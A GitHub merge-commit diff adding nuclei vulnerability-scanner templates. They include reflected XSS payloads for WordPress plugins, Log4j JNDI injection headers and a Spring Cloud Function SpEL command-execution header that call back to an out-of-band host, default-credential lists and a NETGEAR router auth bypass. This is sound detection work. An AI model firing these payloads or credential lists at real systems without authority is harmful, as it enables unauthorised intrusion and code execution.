Merge branch 'projectdiscovery:master' into master

patch-1
idealphase 2022-03-28 14:05:48 +07:00 committed by GitHub
commit 06a553e4a4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
21 changed files with 1934 additions and 1433 deletions

View File

@ -1,21 +1 @@
cnvd/2021/CNVD-2021-01931.yaml vulnerabilities/springboot/springboot-log4j-rce.yaml
cnvd/2021/CNVD-2021-14536.yaml
cves/2020/CVE-2020-17456.yaml
cves/2020/CVE-2020-27467.yaml
cves/2021/CVE-2021-41691.yaml
cves/2021/CVE-2021-42063.yaml
cves/2022/CVE-2022-0437.yaml
exposed-panels/avtech-avn801-camera-panel.yaml
exposed-panels/beyondtrust-login-server.yaml
exposed-panels/beyondtrust-panel.yaml
exposed-panels/directadmin-login-panel.yaml
exposed-panels/open-virtualization-manager-panel.yaml
misconfiguration/jolokia/jolokia-info-disclosure.yaml
misconfiguration/jolokia/jolokia-list.yaml
misconfiguration/jolokia/jolokia-mbean-search.yaml
technologies/open-virtualization-manager-detect.yaml
token-spray/api-cloudflare.yaml
vulnerabilities/huawei/huawei-hg255s-lfi.yaml
vulnerabilities/other/oracle-fatwire-lfi.yaml
vulnerabilities/other/tekon-info-leak.yaml
vulnerabilities/wordpress/wordpress-wp-cron.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1071 | daffainfo | 546 | cves | 1069 | info | 1094 | http | 2949 | | cve | 1080 | daffainfo | 550 | cves | 1079 | info | 1105 | http | 2983 |
| panel | 469 | dhiyaneshdk | 407 | exposed-panels | 471 | high | 794 | file | 57 | | panel | 475 | dhiyaneshdk | 411 | exposed-panels | 477 | high | 808 | file | 57 |
| lfi | 433 | pikpikcu | 313 | vulnerabilities | 422 | medium | 625 | network | 49 | | lfi | 437 | pikpikcu | 314 | vulnerabilities | 428 | medium | 630 | network | 49 |
| xss | 338 | pdteam | 257 | technologies | 227 | critical | 389 | dns | 17 | | xss | 344 | pdteam | 258 | technologies | 229 | critical | 390 | dns | 17 |
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 173 | | | | wordpress | 334 | geeknik | 176 | exposures | 199 | low | 176 | | |
| exposure | 282 | dwisiswant0 | 165 | misconfiguration | 193 | unknown | 6 | | | | exposure | 283 | dwisiswant0 | 165 | misconfiguration | 195 | unknown | 6 | | |
| rce | 272 | 0x_akoko | 115 | workflows | 185 | | | | | | rce | 274 | 0x_akoko | 117 | workflows | 185 | | | | |
| cve2021 | 260 | princechaddha | 109 | token-spray | 149 | | | | | | cve2021 | 264 | gy741 | 112 | token-spray | 150 | | | | |
| tech | 238 | gy741 | 109 | default-logins | 78 | | | | | | tech | 240 | princechaddha | 109 | default-logins | 82 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | | | wp-plugin | 239 | pussycat0x | 107 | takeovers | 67 | | | | |
**236 directories, 3310 files**. **239 directories, 3325 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1071 | daffainfo | 546 | cves | 1069 | info | 1094 | http | 2949 | | cve | 1080 | daffainfo | 550 | cves | 1079 | info | 1105 | http | 2983 |
| panel | 469 | dhiyaneshdk | 407 | exposed-panels | 471 | high | 794 | file | 57 | | panel | 475 | dhiyaneshdk | 411 | exposed-panels | 477 | high | 808 | file | 57 |
| lfi | 433 | pikpikcu | 313 | vulnerabilities | 422 | medium | 625 | network | 49 | | lfi | 437 | pikpikcu | 314 | vulnerabilities | 428 | medium | 630 | network | 49 |
| xss | 338 | pdteam | 257 | technologies | 227 | critical | 389 | dns | 17 | | xss | 344 | pdteam | 258 | technologies | 229 | critical | 390 | dns | 17 |
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 173 | | | | wordpress | 334 | geeknik | 176 | exposures | 199 | low | 176 | | |
| exposure | 282 | dwisiswant0 | 165 | misconfiguration | 193 | unknown | 6 | | | | exposure | 283 | dwisiswant0 | 165 | misconfiguration | 195 | unknown | 6 | | |
| rce | 272 | 0x_akoko | 115 | workflows | 185 | | | | | | rce | 274 | 0x_akoko | 117 | workflows | 185 | | | | |
| cve2021 | 260 | princechaddha | 109 | token-spray | 149 | | | | | | cve2021 | 264 | gy741 | 112 | token-spray | 150 | | | | |
| tech | 238 | gy741 | 109 | default-logins | 78 | | | | | | tech | 240 | princechaddha | 109 | default-logins | 82 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | | | wp-plugin | 239 | pussycat0x | 107 | takeovers | 67 | | | | |

View File

@ -0,0 +1,49 @@
id: CVE-2021-25055
info:
name: FeedWordPress < 2022.0123 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
reference:
- https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-25055
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=1 onerror=alert(document.domain)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,49 @@
id: CVE-2021-25112
info:
name: WHMCS Bridge < 6.4b - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-25112
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src onerror=alert(document.domain)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -1,14 +1,14 @@
id: CVE-2021-41691 id: CVE-2021-41691
info: info:
name: openSIS Student Information System 8.0 SQl Injection Vulnerability name: OpenSIS Student Information System 8.0 - Authenticated SQL Injection
author: Bartu Utku SARP author: Bartu Utku SARP
severity: high severity: high
reference: reference:
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
- https://www.exploit-db.com/exploits/50637 - https://www.exploit-db.com/exploits/50637
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
tags: cve,cve2021,opensis,sqli,auth tags: cve,cve2021,opensis,sqli,authenticated
requests: requests:
- raw: - raw:

View File

@ -22,7 +22,11 @@ info:
requests: requests:
- raw: - raw:
- | - |
GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1 GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
Host: {{Hostname}}
- |
GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}} Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}} Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
@ -43,6 +47,7 @@ requests:
X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}} X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}} X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word

View File

@ -0,0 +1,48 @@
id: CVE-2022-0148
info:
name: All-in-one Floating Contact Form < 2.0.4 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: The plugin was vulnerable to reflected XSS on the my-sticky-elements-leads admin page.
reference:
- https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148
tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2022-0148
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(`document.domain`) x">'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,53 @@
id: CVE-2022-0189
info:
name: WP RSS Aggregator < 4.20 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-0189
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src onerror=alert(`document.domain`)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,39 @@
id: dolphinscheduler-default-login
info:
name: Apache DolphinScheduler Default Login
author: For3stCo1d
severity: high
reference: https://github.com/apache/dolphinscheduler
metadata:
shodan-query: http.title:"DolphinScheduler"
tags: apache,dolphinscheduler,default-login,oss
requests:
- raw:
- |
POST /dolphinscheduler/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName={{user}}&userPassword={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- dolphinscheduler123
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"msg":"login success"'
- '"sessionId":'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,63 @@
id: hue-default-credential
info:
name: Cloudera Hue Default Admin Login
author: For3stCo1d
severity: high
description: Hue default admin login was discovered.
reference: https://github.com/cloudera/hue
metadata:
shodan-query: title:"Hue - Welcome to Hue"
tags: hue,default-login,oss
requests:
- raw:
- |
GET /hue/accounts/login?next=/ HTTP/1.1
Host: {{Hostname}}
- |
POST /hue/accounts/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
attack: pitchfork
payloads:
user:
- admin
- hue
- hadoop
- cloudera
pass:
- admin
- hue
- hadoop
- cloudera
cookie-reuse: true
extractors:
- type: regex
name: csrfmiddlewaretoken
part: body
internal: true
group: 1
regex:
- name='csrfmiddlewaretoken' value='(.+?)'
req-condition: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(tolower(body_1), 'welcome to hue')
- contains(tolower(all_headers_2), 'csrftoken=')
- contains(tolower(all_headers_2), 'sessionid=')
condition: and
- type: status
status:
- 302

View File

@ -0,0 +1,32 @@
id: emqx-default-login
info:
name: Emqx Default Login
author: For3stCo1d
severity: high
metadata:
shodan-query: http.favicon.hash:"-670975485"
tags: emqx,default-login
requests:
- raw:
- |
POST /api/v4/auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"username":"{{user}}","password":"{{pass}}"}
attack: pitchfork
payloads:
user:
- admin
pass:
- public
matchers:
- type: dsl
dsl:
- body == "{\"code\":0}"
- status_code == 200
condition: and

View File

@ -0,0 +1,37 @@
id: geoserver-default-login
info:
name: Geoserver Default Login
author: For3stCo1d
severity: high
metadata:
fofa-query: app="GeoServer"
tags: geoserver,default-login
requests:
- raw:
- |
POST /geoserver/j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- geoserver
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(tolower(location), '/geoserver/web')"
- "!contains(tolower(location), 'error=true')"
condition: and
- type: status
status:
- 302

View File

@ -1,7 +1,7 @@
id: open-virtualization-manager-panel id: open-virtualization-manager-panel
info: info:
name: Open Virtualization Manager Userportal and Webadmin panel name: Open Virtualization Userportal & Webadmin Panel
author: idealphase author: idealphase
severity: info severity: info
description: open-source distributed virtualization solution, designed to manage your entire enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible. description: open-source distributed virtualization solution, designed to manage your entire enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.

View File

@ -1,7 +1,7 @@
id: jolokia-mbean-search id: jolokia-mbean-search
info: info:
name: Jolokia -Searching MBeans name: Jolokia - Searching MBeans
author: pussycat0x author: pussycat0x
severity: low severity: low
reference: reference:

View File

@ -0,0 +1,19 @@
id: emqx-detection
info:
name: Emqx Detection
author: For3stCo1d
severity: info
tags: tech,emqx
requests:
- method: GET
path:
- "{{BaseURL}}/static/emq.ico"
matchers-condition: and
matchers:
- type: dsl
name: favicon
dsl:
- "status_code==200 && ('-670975485' == mmh3(base64_py(body)))"

View File

@ -0,0 +1,27 @@
id: netgear-wac124-router-auth-bypass
info:
name: NETGEAR WAC124 Router Authentication Bypass
author: gy741
severity: high
description: |
This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.
reference:
- https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
- https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
tags: netgear,auth-bypass,router,iot
requests:
- method: GET
path:
- "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Enable Telnet"

View File

@ -0,0 +1,47 @@
id: springboot-log4j-rce
info:
name: Spring Boot Log4j Remote Code Injection
author: pdteam
severity: critical
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
tags: springboot,rce,oast,log4j
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2021-44228
cwe-id: CWE-502
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

View File

@ -0,0 +1,33 @@
id: springcloud-function-spel-rce
info:
name: Spring Cloud Function SPEL RCE
author: Mr-xn
severity: critical
reference:
- https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
- https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
tags: springcloud,rce
requests:
- raw:
- |
POST /{{rand_base(8)}} HTTP/1.1
Host: {{Hostname}}
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
Content-Type: application/x-www-form-urlencoded
{{rand_base(8)}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
condition: or
- type: status
status:
- 500